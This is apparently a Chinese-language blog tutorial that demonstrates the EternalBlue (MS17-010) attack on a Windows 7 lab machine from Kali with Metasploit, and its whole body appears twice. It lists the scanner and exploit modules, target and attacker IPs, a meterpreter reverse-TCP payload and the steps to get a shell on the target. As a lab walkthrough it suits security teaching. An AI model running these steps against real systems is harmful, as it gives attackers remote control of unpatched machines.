最新消息: USBMI致力于为网友们分享Windows、安卓、IOS等主流手机系统相关的资讯以及评测、同时提供相关教程、应用、软件下载等服务。

网安尝鲜,永恒之蓝攻击Win7演示(超详细)

业界 admin 4浏览 0评论

一、前言:

此处使用kali 2022.3作为攻击机,Windows7 x64旗舰版作为靶机进行演示

二、演示

1、关闭防火墙

这里没有做绕过,所以首先需要手动关闭win7的防火墙

2、查看ip

通过命令查看攻击机和靶机的ip

win7命令:ipconfig

kali命令:ifconfig

win7:192.168.13.132

kali:192.168.13.129

可以看出攻击机和靶机在同一网段下

3、启动msf

运行命令启动msf

msfconsole

启动后会出现一个图案,如果和这个不一样也是正常的,因为这个图案是随机的

4、扫描漏洞进行攻击

运行命令扫描ms17_010漏洞

search ms17_010

选择扫描模块进行漏洞扫描

use auxiliary/scanner/smb/smb_ms17_010

运行攻击模块

use exploit/windows/smb/ms17_010_eternalblue

设置靶机ip

set RHOSTS 192.168.13.132

设置攻击机ip

set LHOST 192.168.13.129

设置攻击载荷

set payload windows/x64/meterpreter/reverse_tcp

进行攻击

exploit

现在就已经攻击成功了

查看系统信息

sysinfo

进入Windows PowerShell

shell

如图所示,会出现乱码

在shell中运行chcp 65001即可解决乱码问题

chcp 65001

然后你就可以在你的靶机里面操作了

一、前言:

此处使用kali 2022.3作为攻击机,Windows7 x64旗舰版作为靶机进行演示

二、演示

1、关闭防火墙

这里没有做绕过,所以首先需要手动关闭win7的防火墙

2、查看ip

通过命令查看攻击机和靶机的ip

win7命令:ipconfig

kali命令:ifconfig

win7:192.168.13.132

kali:192.168.13.129

可以看出攻击机和靶机在同一网段下

3、启动msf

运行命令启动msf

msfconsole

启动后会出现一个图案,如果和这个不一样也是正常的,因为这个图案是随机的

4、扫描漏洞进行攻击

运行命令扫描ms17_010漏洞

search ms17_010

选择扫描模块进行漏洞扫描

use auxiliary/scanner/smb/smb_ms17_010

运行攻击模块

use exploit/windows/smb/ms17_010_eternalblue

设置靶机ip

set RHOSTS 192.168.13.132

设置攻击机ip

set LHOST 192.168.13.129

设置攻击载荷

set payload windows/x64/meterpreter/reverse_tcp

进行攻击

exploit

现在就已经攻击成功了

查看系统信息

sysinfo

进入Windows PowerShell

shell

如图所示,会出现乱码

在shell中运行chcp 65001即可解决乱码问题

chcp 65001

然后你就可以在你的靶机里面操作了

发布评论

评论列表 (0)

  1. 暂无评论